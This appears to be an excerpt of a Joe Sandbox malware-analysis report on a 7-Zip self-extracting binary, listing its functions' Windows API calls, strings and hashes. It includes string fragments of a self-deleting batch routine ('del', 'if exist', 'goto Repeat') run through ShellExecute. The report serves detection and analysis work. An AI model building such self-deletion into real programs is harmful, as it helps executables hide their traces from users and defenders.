Instruction ID: 593f74aba8cbd25357504dd2d18fce0fb38989f15731237b119c96727be92a00
Opcode Fuzzy Hash: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
Instruction Fuzzy Hash: 7521C53291462547CB02CE6EE4845A7F392FFC436BF174767ED8467290C629A85486E0

Function 00413AAB Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d88b4545622fc2f48369f3988b55fed1d0241348448e0d26e09a3dd7181b3030
Instruction ID: f31e75e8446499c6638a38678b48eff386f2da62f80cbfd2527233499c21bf4b
Opcode Fuzzy Hash: d88b4545622fc2f48369f3988b55fed1d0241348448e0d26e09a3dd7181b3030
Instruction Fuzzy Hash: 21213B7291842587C701DF1DE4886B7B3E1FFC431AF678A3BD9828B182C638E885D794

Function 0040503E Relevance: 56.2, APIs: 30, Strings: 2, Instructions: 213threadprocesssynchronizationCOMMON

Download Yara Rule

APIs

GetCommandLineW.KERNEL32(?,?,?), ref: 0040505F
??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 00405122
??3@YAXPAX@Z.MSVCRT(?,?,00000000), ref: 0040512A
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00405132
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000), ref: 0040513A
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000), ref: 00405142
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000), ref: 0040514A
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000), ref: 00405152
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000), ref: 0040515A
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 00405162
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040516A
GetStartupInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405183
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000001,01000004,00000000,00000044,?), ref: 004051AA
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 004051B4
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 004051BF
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 004051C7
CreateJobObjectW.KERNEL32(00000000,00000000), ref: 004051DC
AssignProcessToJobObject.KERNEL32(00000000,?), ref: 004051F3
CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00405203
SetInformationJobObject.KERNEL32(?,00000007,?,00000008), ref: 00405224
ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040522D
GetQueuedCompletionStatus.KERNEL32(00000000,?,?,?,000000FF,?,?,?,?,?,?,?,?,?,00000000), ref: 0040524C
ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405255
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,00000000), ref: 0040525C
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040526B
GetExitCodeProcess.KERNEL32(?,?), ref: 00405274
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 0040527F
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 0040528B
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00405292
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040529D

Strings

sfxwaitall, xrefs: 00405085
" -, xrefs: 0040508A

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: ??3@$CloseHandleObject$CreateProcess$CompletionErrorLastResumeThread$AssignCodeCommandExitInfoInformationLinePortQueuedSingleStartupStatusWait
String ID: " -$sfxwaitall
API String ID: 2734624574-3991362806
Opcode ID: c576ddda3cb22813f92d1ea0a50b073aab1b0f041d900a3914aafabf44139407
Instruction ID: b3327515afe2f0509fed3fa0d446ddd4546a9b02c844584286d91d1d95b89973
Opcode Fuzzy Hash: c576ddda3cb22813f92d1ea0a50b073aab1b0f041d900a3914aafabf44139407
Instruction Fuzzy Hash: 73614DB2800148BBDF11BFA1DC45EDF3B6CFF54308F10853AFA15A21A1DA399A559F68

Function 00405304 Relevance: 36.9, APIs: 14, Strings: 7, Instructions: 144fileCOMMON

Download Yara Rule

APIs

GetDriveTypeW.KERNEL32(?,?,00000000), ref: 0040534B
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0040537C
WriteFile.KERNEL32(00419858,?,?,00406D05,00000000,del ",:Repeat,00000000), ref: 00405431
??3@YAXPAX@Z.MSVCRT(?), ref: 0040543C
CloseHandle.KERNEL32(00419858), ref: 00405445
SetFileAttributesW.KERNEL32(00406D05,00000000), ref: 0040545C
ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 0040546E
??3@YAXPAX@Z.MSVCRT(?), ref: 00405477
??3@YAXPAX@Z.MSVCRT(?), ref: 00405483
??3@YAXPAX@Z.MSVCRT(00406D05,?), ref: 00405489
??3@YAXPAX@Z.MSVCRT(00406D05,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00406D05,00419858), ref: 004054B7

Strings

:Repeat, xrefs: 00405397
" goto Repeat, xrefs: 004053E5
", xrefs: 004053BE, 004053C3, 00405407
del ", xrefs: 004053A4, 004053A9, 004053F2
if exist ", xrefs: 004053CC
open, xrefs: 00405468
7ZSfx%03x.cmd, xrefs: 0040535D

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: ??3@$File$AttributesCloseCreateDriveExecuteHandleShellTypeWrite
String ID: "$" goto Repeat$7ZSfx%03x.cmd$:Repeat$del "$if exist "$open
API String ID: 3007203151-3467708659
Opcode ID: bc9866227df6a082dd45c647f50685e9e39f62763f2fa5a47f650fc85807f56f
Instruction ID: d0d69a7dd8ff82dd971fb120c5bc6d20105d604efb913bdcb2d31d3208e79299
Opcode Fuzzy Hash: bc9866227df6a082dd45c647f50685e9e39f62763f2fa5a47f650fc85807f56f
Instruction Fuzzy Hash: 8E418E31C00109BADB11ABA0DC86DEF7779EF14319F50802AF515761E1EB785E86DB68

Function 0040312D Relevance: 35.1, APIs: 16, Strings: 4, Instructions: 123windowlibrarystringCOMMON

Download Yara Rule

APIs

GetClassNameA.USER32(?,?,00000040), ref: 00403140
lstrcmpiA.KERNEL32(?,STATIC), ref: 00403153
GetWindowLongW.USER32(?,000000F0), ref: 00403160

Part of subcall function 004030EA: GetWindowTextLengthW.USER32(?), ref: 004030FB
Part of subcall function 004030EA: GetWindowTextW.USER32(t1@,00000000,00000001), ref: 00403118

??3@YAXPAX@Z.MSVCRT(?), ref: 0040318D
GetParent.USER32(?), ref: 0040319B
LoadLibraryA.KERNEL32(riched20), ref: 004031AF
GetMenu.USER32(?), ref: 004031C2
SetThreadLocale.KERNEL32(00000419), ref: 004031CF
CreateWindowExW.USER32(00000000,RichEdit20W,004154C8,50000804,?,?,?,?,?,00000000,00000000,00000000), ref: 004031FF
DestroyWindow.USER32(?), ref: 00403210
SendMessageW.USER32(00000000,00000459,00000022,00000000), ref: 00403225
GetSysColor.USER32(0000000F), ref: 00403229
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00403237
SendMessageW.USER32(00000000,00000461,?,?), ref: 00403262
??3@YAXPAX@Z.MSVCRT(?), ref: 00403267
??3@YAXPAX@Z.MSVCRT(?,?), ref: 0040326F

Strings

{\rtf, xrefs: 00403176
STATIC, xrefs: 0040314A
riched20, xrefs: 004031AA
RichEdit20W, xrefs: 004031F9

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: Window$??3@MessageSend$Text$ClassColorCreateDestroyLengthLibraryLoadLocaleLongMenuNameParentThreadlstrcmpi
String ID: RichEdit20W$STATIC$riched20${\rtf
API String ID: 3514532227-2281146334
Opcode ID: 6a2ef85bb8466b284f341e562f305245560d17f4b0350e1b805e867f4a5d8a7e
Instruction ID: 373b527b6ca097a0cf97d4fb6958eb329f6bb70dd43407f4b4eeb9307f1859e1
Opcode Fuzzy Hash: 6a2ef85bb8466b284f341e562f305245560d17f4b0350e1b805e867f4a5d8a7e
Instruction Fuzzy Hash: 61319E72900509FFDB01AFA4DC49EEF7BBDAF48716F108036F605F6190DA788A418B68

Function 004086EB Relevance: 34.8, APIs: 23, Instructions: 265windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00408AB5), ref: 00408714
LoadIconW.USER32(00000000), ref: 00408717
GetSystemMetrics.USER32(00000032), ref: 0040872B
GetSystemMetrics.USER32(00000031), ref: 00408730
GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00408AB5), ref: 00408739
LoadImageW.USER32(00000000), ref: 0040873C
SendMessageW.USER32(?,00000080,00000001,?), ref: 0040875C
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408765
GetDlgItem.USER32(?,000004B2), ref: 00408781
GetDlgItem.USER32(?,000004B2), ref: 0040878B
GetWindowLongW.USER32(?,000000F0), ref: 00408797
SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087A6
GetDlgItem.USER32(?,000004B5), ref: 004087B4
GetDlgItem.USER32(?,000004B5), ref: 004087C2
GetWindowLongW.USER32(?,000000F0), ref: 004087CE
SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087DD
GetWindow.USER32(?,00000005), ref: 004088C3
GetWindow.USER32(?,00000005), ref: 004088DF
GetWindow.USER32(?,00000005), ref: 004088F7
GetModuleHandleW.KERNEL32(00000000,00000065,000004B4,00000000,000004B3,00000000,000004B2,?,000004B7,?,?,?,?,?,00408AB5), ref: 00408957
LoadIconW.USER32(00000000), ref: 0040895E
GetDlgItem.USER32(?,000004B1), ref: 0040897D
SendMessageW.USER32(00000000), ref: 00408980

Part of subcall function 00407B0D: GetDlgItem.USER32(?,?), ref: 00407B17
Part of subcall function 00407B0D: GetWindowTextLengthW.USER32(00000000), ref: 00407B1E

Part of subcall function 004071DA: GetDlgItem.USER32(?,?), ref: 004071E7
Part of subcall function 004071DA: ShowWindow.USER32(00000000,?), ref: 004071FE

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: Window$Item$Long$HandleLoadMessageModuleSend$IconMetricsSystem$ImageLengthShowText
String ID:
API String ID: 3694754696-0
Opcode ID: 8792f65208e43fda3f0ae599c7562791de8770737c82b3f6a889dddbd826b917
Instruction ID: ec505544c7bb35dede6d5bcefb07895398d021ded876e535e02418492f258e54
Opcode Fuzzy Hash: 8792f65208e43fda3f0ae599c7562791de8770737c82b3f6a889dddbd826b917
Instruction Fuzzy Hash: D671F8B1344705ABE6117B619E4AF3B7659DB80714F10443EF6827A2E2CFBCAC018A5E

Function 00404B06 Relevance: 33.5, APIs: 3, Strings: 16, Instructions: 207stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(00000000,004166B8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404BE2

Part of subcall function 00402187: GetLastError.KERNEL32(00000000,00000020,-00000002), ref: 004021D6
Part of subcall function 00402187: wsprintfW.USER32 ref: 004021E7
Part of subcall function 00402187: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 004021FC
Part of subcall function 00402187: GetLastError.KERNEL32 ref: 00402201
Part of subcall function 00402187: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040221C
Part of subcall function 00402187: GetEnvironmentVariableW.KERNEL32(?,00000000,00000004), ref: 0040222F
Part of subcall function 00402187: GetLastError.KERNEL32 ref: 00402236
Part of subcall function 00402187: lstrcmpiW.KERNEL32(024B4890,00404926), ref: 0040224B
Part of subcall function 00402187: ??3@YAXPAX@Z.MSVCRT(024B4890), ref: 0040225B
Part of subcall function 00402187: SetLastError.KERNEL32(?), ref: 00402282
Part of subcall function 00402187: lstrlenA.KERNEL32(00416208), ref: 004022B6
Part of subcall function 00402187: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004022D1
Part of subcall function 00402187: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402303

_wtol.MSVCRT ref: 00404CDF
_wtol.MSVCRT ref: 00404CFB

Strings

OverwriteMode, xrefs: 00404C24
ErrorTitle, xrefs: 00404B82
CancelPrompt, xrefs: 00404D34
Title, xrefs: 00404B14
ExtractDialogWidth, xrefs: 00404CC1
GUIMode, xrefs: 00404BF7
Progress, xrefs: 00404BCA
GUIFlags, xrefs: 00404C41, 00404C46, 00404C62
WarningTitle, xrefs: 00404B9A
ExtractPathTitle, xrefs: 00404D04
ExtractCancelText, xrefs: 00404CA4
ExtractDialogText, xrefs: 00404CB0
ExtractTitle, xrefs: 00404BB2
ExtractPathWidth, xrefs: 00404CE8
ExtractPathText, xrefs: 00404D1C
MiscFlags, xrefs: 00404C74, 00404C79, 00404C95

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: ErrorLast$??2@EnvironmentVariable_wtollstrcmpi$??3@InfoLocalelstrlenwsprintf
String ID: CancelPrompt$ErrorTitle$ExtractCancelText$ExtractDialogText$ExtractDialogWidth$ExtractPathText$ExtractPathTitle$ExtractPathWidth$ExtractTitle$GUIFlags$GUIMode$MiscFlags$OverwriteMode$Progress$Title$WarningTitle
API String ID: 2725485552-1675048025
Opcode ID: 07b1172011b0cd173d857418f64cc138280eef6e6d3e42432808643f3bcd4bbd
Instruction ID: efab4658e061a586f4080eb8d96ca385680a2b42527defa3ddb57561e196b8fa
Opcode Fuzzy Hash: 07b1172011b0cd173d857418f64cc138280eef6e6d3e42432808643f3bcd4bbd
Instruction Fuzzy Hash: F151B8F6E01104BADB11AF616D8ADEF36ACDE41708725443FF904F22C2E6BD8E85466D

Function 00401EB2 Relevance: 31.6, APIs: 21, Instructions: 121windowCOMMON

Download Yara Rule

APIs

GetWindowDC.USER32(00000000), ref: 00401EBE
GetDeviceCaps.GDI32(00000000,00000058), ref: 00401ECA
MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401EE3
GetObjectW.GDI32(?,00000018,?), ref: 00401F12
MulDiv.KERNEL32(?,00000003,00000002), ref: 00401F1D
MulDiv.KERNEL32(?,00000003,00000002), ref: 00401F27
CreateCompatibleDC.GDI32(?), ref: 00401F35
CreateCompatibleDC.GDI32(?), ref: 00401F3C
SelectObject.GDI32(00000000,?), ref: 00401F4A
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401F58
SelectObject.GDI32(00000000,00000000), ref: 00401F60
SetStretchBltMode.GDI32(00000000,00000004), ref: 00401F68
StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401F87
GetCurrentObject.GDI32(00000000,00000007), ref: 00401F90
SelectObject.GDI32(00000000,?), ref: 00401F9D
SelectObject.GDI32(00000000,?), ref: 00401FA3
DeleteDC.GDI32(00000000), ref: 00401FAC
DeleteDC.GDI32(00000000), ref: 00401FAF
ReleaseDC.USER32(00000000,?), ref: 00401FB6
ReleaseDC.USER32(00000000,?), ref: 00401FC5
CopyImage.USER32(?,00000000,00000000,00000000,00000000), ref: 00401FD2

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: Object$Select$CompatibleCreate$DeleteReleaseStretch$BitmapCapsCopyCurrentDeviceImageModeWindow
String ID:
API String ID: 3462224810-0
Opcode ID: bc7c6b49b760a043a5ca8b23895b80fbacfe81e10fbdf0cdd542d6a2194e7bcc
Instruction ID: f87cdcd409c0e6d8f104c470e9418599ce0c3db21cc9cfda4b735dde8093d4f2
Opcode Fuzzy Hash: bc7c6b49b760a043a5ca8b23895b80fbacfe81e10fbdf0cdd542d6a2194e7bcc
Instruction Fuzzy Hash: B0310676D40208FFDF115BE1DD48EEF7FB9EB88761F108066FA04A61A0C6754A50AFA4

Function 00401FDD Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 120windowcommemoryCOMMON

Download Yara Rule

APIs

GetClassNameA.USER32(?,?,00000040), ref: 00401FEF
lstrcmpiA.KERNEL32(?,STATIC), ref: 00402006
GetWindowLongW.USER32(?,000000F0), ref: 00402019
GetMenu.USER32(?), ref: 0040202E

Part of subcall function 00401DC9: GetModuleHandleW.KERNEL32(00000000), ref: 00401DD4
Part of subcall function 00401DC9: FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401DF1
Part of subcall function 00401DC9: FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401E05
Part of subcall function 00401DC9: SizeofResource.KERNEL32(00000000,00000000), ref: 00401E16
Part of subcall function 00401DC9: LoadResource.KERNEL32(00000000,00000000), ref: 00401E20
Part of subcall function 00401DC9: LockResource.KERNEL32(00000000), ref: 00401E2B

GlobalAlloc.KERNEL32(00000040,00000010), ref: 00402060
memcpy.MSVCRT(00000000,00000000,00000010), ref: 0040206D
CoInitialize.OLE32(00000000), ref: 00402076
CreateStreamOnHGlobal.OLE32(00000000,00000000,?), ref: 00402082
OleLoadPicture.OLEAUT32(?,00000000,00000000,00416E50,?), ref: 004020A7
GlobalFree.KERNEL32(00000000), ref: 004020B7

Part of subcall function 00401EB2: GetWindowDC.USER32(00000000), ref: 00401EBE
Part of subcall function 00401EB2: GetDeviceCaps.GDI32(00000000,00000058), ref: 00401ECA
Part of subcall function 00401EB2: MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401EE3
Part of subcall function 00401EB2: GetObjectW.GDI32(?,00000018,?), ref: 00401F12
Part of subcall function 00401EB2: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401F1D
Part of subcall function 00401EB2: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401F27
Part of subcall function 00401EB2: CreateCompatibleDC.GDI32(?), ref: 00401F35
Part of subcall function 00401EB2: CreateCompatibleDC.GDI32(?), ref: 00401F3C
Part of subcall function 00401EB2: SelectObject.GDI32(00000000,?), ref: 00401F4A
Part of subcall function 00401EB2: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401F58
Part of subcall function 00401EB2: SelectObject.GDI32(00000000,00000000), ref: 00401F60
Part of subcall function 00401EB2: SetStretchBltMode.GDI32(00000000,00000004), ref: 00401F68
Part of subcall function 00401EB2: StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401F87
Part of subcall function 00401EB2: GetCurrentObject.GDI32(00000000,00000007), ref: 00401F90
Part of subcall function 00401EB2: SelectObject.GDI32(00000000,?), ref: 00401F9D
Part of subcall function 00401EB2: SelectObject.GDI32(00000000,?), ref: 00401FA3
Part of subcall function 00401EB2: DeleteDC.GDI32(00000000), ref: 00401FAC
Part of subcall function 00401EB2: DeleteDC.GDI32(00000000), ref: 00401FAF
Part of subcall function 00401EB2: ReleaseDC.USER32(00000000,?), ref: 00401FB6

GetObjectW.GDI32(00000000,00000018,?), ref: 004020E9
SetWindowPos.USER32(00000010,00000000,00000000,00000000,?,?,00000006), ref: 004020FD
SendMessageW.USER32(00000010,00000172,00000000,?), ref: 0040210F
GlobalFree.KERNEL32(00000000), ref: 00402124

Strings

IMAGES, xrefs: 00402038
STATIC, xrefs: 00401FFD

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: Object$Resource$CreateGlobalSelect$CompatibleWindow$DeleteFindFreeLoadStretch$AllocBitmapCapsClassCurrentDeviceHandleInitializeLockLongMenuMessageModeModuleNamePictureReleaseSendSizeofStreamlstrcmpimemcpy
String ID: IMAGES$STATIC
API String ID: 4202116410-1168396491
Opcode ID: b54bb7280c56bf500d59ef5ed5a6444fd67b84fc2872fad343f2864c8519ddee
Instruction ID: 87364bf851807a9d3783278cfb79ffb10547d227827cc6f6944e766e6ae994b9
Opcode Fuzzy Hash: b54bb7280c56bf500d59ef5ed5a6444fd67b84fc2872fad343f2864c8519ddee
Instruction Fuzzy Hash: 00418F31900108FFCB119FA0DC4CEEF7F79EF49741B008065FA05A61A0D7798A55DB64

Function 00408B36 Relevance: 27.1, APIs: 18, Instructions: 144windowcomtimeCOMMON

Download Yara Rule

APIs

Part of subcall function 004071DA: GetDlgItem.USER32(?,?), ref: 004071E7
Part of subcall function 004071DA: ShowWindow.USER32(00000000,?), ref: 004071FE

GetDlgItem.USER32(?,000004B8), ref: 00408B63
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00408B72
GetDlgItem.USER32(?,000004B5), ref: 00408BB9
GetWindowLongW.USER32(00000000,000000F0), ref: 00408BBE
GetDlgItem.USER32(?,000004B5), ref: 00408BCE
SetWindowLongW.USER32(00000000), ref: 00408BD1
GetSystemMenu.USER32(?,00000000,000004B4,00000000), ref: 00408BF7
EnableMenuItem.USER32(00000000,0000F060,00000001), ref: 00408C09
GetDlgItem.USER32(?,000004B4), ref: 00408C13
SetFocus.USER32(00000000), ref: 00408C16
SetTimer.USER32(?,00000001,00000000,00000000), ref: 00408C45
CoCreateInstance.OLE32(00416E80,00000000,00000001,00416B08,?), ref: 00408C69
GetDlgItem.USER32(?,00000002), ref: 00408C86
IsWindow.USER32(00000000), ref: 00408C89
GetDlgItem.USER32(?,00000002), ref: 00408C99
EnableWindow.USER32(00000000), ref: 00408C9C
GetDlgItem.USER32(?,000004B5), ref: 00408CB0
ShowWindow.USER32(00000000), ref: 00408CB3

Part of subcall function 00407A3B: GetDlgItem.USER32(?,000004B6), ref: 00407A49

Part of subcall function 004086EB: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00408AB5), ref: 00408714
Part of subcall function 004086EB: LoadIconW.USER32(00000000), ref: 00408717
Part of subcall function 004086EB: GetSystemMetrics.USER32(00000032), ref: 0040872B
Part of subcall function 004086EB: GetSystemMetrics.USER32(00000031), ref: 00408730
Part of subcall function 004086EB: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00408AB5), ref: 00408739
Part of subcall function 004086EB: LoadImageW.USER32(00000000), ref: 0040873C
Part of subcall function 004086EB: SendMessageW.USER32(?,00000080,00000001,?), ref: 0040875C
Part of subcall function 004086EB: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408765
Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B2), ref: 00408781
Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B2), ref: 0040878B
Part of subcall function 004086EB: GetWindowLongW.USER32(?,000000F0), ref: 00408797
Part of subcall function 004086EB: SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087A6
Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B5), ref: 004087B4
Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B5), ref: 004087C2
Part of subcall function 004086EB: GetWindowLongW.USER32(?,000000F0), ref: 004087CE
Part of subcall function 004086EB: SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087DD

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: Item$Window$Long$MessageSendSystem$EnableHandleLoadMenuMetricsModuleShow$CreateFocusIconImageInstanceTimer
String ID:
API String ID: 1057135554-0
Opcode ID: 4c11372e592c7ee729e35fc86577e60408999ac1414f6f050f9cdca6ecb8968b
Instruction ID: 260128caa5a256333788f33680fc13296caa9e9ac1428af8f37f53b95f277c78
Opcode Fuzzy Hash: 4c11372e592c7ee729e35fc86577e60408999ac1414f6f050f9cdca6ecb8968b
Instruction Fuzzy Hash: E1415B71644708EBDA246F26DE49F977BADEB80B54F00853DF555A62E0CF79AC00CA2C

Function 004072F5 Relevance: 24.3, APIs: 16, Instructions: 294COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000004B3), ref: 0040731D
GetWindowLongW.USER32(00000000,000000F0), ref: 00407322
GetDlgItem.USER32(?,000004B4), ref: 00407359
GetWindowLongW.USER32(00000000,000000F0), ref: 0040735E
GetSystemMetrics.USER32(00000010), ref: 004073E0
GetSystemMetrics.USER32(00000011), ref: 004073E6
GetSystemMetrics.USER32(00000008), ref: 004073ED
GetSystemMetrics.USER32(00000007), ref: 004073F4
GetParent.USER32(?), ref: 00407418
GetClientRect.USER32(00000000,?), ref: 0040742A
ClientToScreen.USER32(?,?), ref: 0040743D
